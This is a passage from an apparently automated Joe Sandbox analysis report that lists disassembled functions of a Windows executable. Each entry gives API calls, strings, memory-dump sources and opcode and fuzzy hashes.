                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: wcschr$Heapiswspace$AllocProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: A
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3731854180-3554254475
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: c25690b87a8360884804bcb8229e23bcc020eb00867746f7a7ec783d5e755514
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 75A16C22A0968B85F760AF51A85027DF6A0FB59790FD08136DA5F877B4DFBCE441CB20
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D153A39C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 111libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: MemoryProcessRead$AddressLibraryLoadProc
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: NTDLL.DLL$NtQueryInformationProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1580871199-2613899276
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: f409ad53100de82966408f53720c59747924a65dd705186128da2f0b9bbf5fd3
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EE516E72A19B9B86FB50AB15A80027DB7A4FB88B84FD45136DA9F43BA4DF7DD001C710
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1517420 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 101fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: CloseCreateFileHandle_open_osfhandle_wcsicmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: con
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 689241570-4257191772
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: c7a2234d9573f6b473384a9ead2fa3a6435853c7d94b0c157743cf5a0c0f015b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 0829e4db7f5da8f1741827ff1a53dfe2277014cdc4087bb797eef745778c3c18
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c7a2234d9573f6b473384a9ead2fa3a6435853c7d94b0c157743cf5a0c0f015b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 01419332A0864B86F310AF15944437DFA91F749BA4FE58335DA2A437A4CFBDD8498760
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D153A58C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 97memoryfileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Heap$File$Process$AllocCloseCreateFreeHandlePointerRead
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: PE
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2941894976-4258593460
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: d3dbf6eefc0a2a227ef4b7c3a1a58b27db0905244b1f318b974def68cec07f75
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9F414161A0869B86F760BB11E41027DF7A0FB89B90FD44232DA5E43BA5DF7DE445CB20
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1520010 Relevance: 13.7, APIs: 9, Instructions: 163fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF7D153849D,?,?,?,00007FF7D153F0C7), ref: 00007FF7D1520045
                                                                                                                                                                                                                                                                                                                                                                                                                                        • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF7D153F0C7,?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7D153E964), ref: 00007FF7D1520071
                                                                                                                                                                                                                                                                                                                                                                                                                                        • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7D1520092
                                                                                                                                                                                                                                                                                                                                                                                                                                        • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7D15200A7
                                                                                                                                                                                                                                                                                                                                                                                                                                        • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7D1520148
                                                                                                                                                                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF7D1520181
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: File$LockPointerShared$AcquireByteCharMultiReadReleaseWide
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 734197835-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 350a32b8b7773a328a2c6bfa9f033ab7091b859c3389a923f16ee056ea562ebb
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 6cceff2fc929e9ed41f795097fec7e9f056f16afcb9c440f5e8b0acbbe23e00d
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 350a32b8b7773a328a2c6bfa9f033ab7091b859c3389a923f16ee056ea562ebb
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F6618F32A0969B86F720AB51A80437DFAA1BB45B44FD48277DD4F827B4DFBCA405C760
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1539B0C Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 261registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Enum$Openwcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: %s=%s$.$\Shell\Open\Command
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3402383852-1459555574
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: d4f4c8f74af0d88aae95a380f5de156173e19187bb68339be651d734a87c6bac
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 14A1A3A2A0864B82FB11BB55D0542BEE3A0EF86B90FD44532DA4F077A4DFBCD945C360
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1527610 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 228COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: memset$wcscmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: %s
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 243296809-3043279178
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 76e25bbe37d1b4078acb033ef5c0999176f7735716d4b3cce97783dd07bc678b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: a6ccc6d7d108d94e6f23f96afce771ece97e41fbc1df8894acad856011204e38
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 76e25bbe37d1b4078acb033ef5c0999176f7735716d4b3cce97783dd07bc678b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 45A17D2370968B96FB65EB21D8403FDA390FB58748FD44076DA4E8B6A5DFBCE6448310
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1511F90 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 174COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: memset$EnvironmentVariable
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: DIRCMD
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1405722092-1465291664
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 8078cba09e9f127300f2d445a1f6b2ae68663ae13b6bf8917c390c7797f52333
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: fdbb5353d4670f72c5480c8a335cbab7be9b1e72735800b49f9621e63435fab7
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8078cba09e9f127300f2d445a1f6b2ae68663ae13b6bf8917c390c7797f52333
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 63817F72A04BC68AFB20DF60E8802ED77A5FB45748F91413ADA4E57B68DF7CD1458720
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D15199F0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D151B9A1,?,?,?,?,00007FF7D151D81A), ref: 00007FF7D151CDA6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D151B9A1,?,?,?,?,00007FF7D151D81A), ref: 00007FF7D151CDBD
                                                                                                                                                                                                                                                                                                                                                                                                                                        • wcschr.MSVCRT(?,?,?,00007FF7D15199DD), ref: 00007FF7D1519A39
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151DF60: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,00000000,00007FF7D151CEAA), ref: 00007FF7D151DFB8
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151DF60: RtlFreeHeap.NTDLL ref: 00007FF7D151DFCC
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151DF60: _setjmp.MSVCRT ref: 00007FF7D151E03E
                                                                                                                                                                                                                                                                                                                                                                                                                                        • wcschr.MSVCRT(?,?,?,00007FF7D15199DD), ref: 00007FF7D1519AF0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • wcschr.MSVCRT(?,?,?,00007FF7D15199DD), ref: 00007FF7D1519B0F
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15196E8: memset.MSVCRT ref: 00007FF7D15197B2
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15196E8: ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7D1519880
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _wcsupr.MSVCRT ref: 00007FF7D152B844
                                                                                                                                                                                                                                                                                                                                                                                                                                        • wcscmp.MSVCRT ref: 00007FF7D152B86D
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Heap$wcschr$Process$AllocFree_setjmp_wcsuprmemsetwcscmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: FOR$ IF
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3663254013-2924197646
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: f7cff311b475cb809cbefbcbc2ea312c8d083385a1c2e3cb15cb3788630bb160
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 49297378012f8672f98db6ba6efa54e0fbdeab7cf4220d790ddf359756d98bbe
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f7cff311b475cb809cbefbcbc2ea312c8d083385a1c2e3cb15cb3788630bb160
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5A51C922B0D60B89FF15BF12901027DB6A1AF49B90FC94636D91F877F1DEBCA4418220
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D151F173 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 119COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • iswdigit.MSVCRT(?,?,00000000,00007FF7D1521F69,?,?,?,?,?,?,?,00007FF7D151286E,00000000,00000000,00000000,00000000), ref: 00007FF7D151F0D6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF7D151E626,?,?,00000000,00007FF7D1521F69), ref: 00007FF7D151F1BA
                                                                                                                                                                                                                                                                                                                                                                                                                                        • wcschr.MSVCRT(?,?,00000000,00007FF7D1521F69,?,?,?,?,?,?,?,00007FF7D151286E,00000000,00000000,00000000,00000000), ref: 00007FF7D151F1E7
                                                                                                                                                                                                                                                                                                                                                                                                                                        • iswdigit.MSVCRT(00000000,00000000,?,00000000,?,00007FF7D151E626,?,?,00000000,00007FF7D1521F69), ref: 00007FF7D151F1FF
                                                                                                                                                                                                                                                                                                                                                                                                                                        • iswdigit.MSVCRT(?,?,00000000,00007FF7D1521F69,?,?,?,?,?,?,?,00007FF7D151286E,00000000,00000000,00000000,00000000), ref: 00007FF7D151F2BB
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
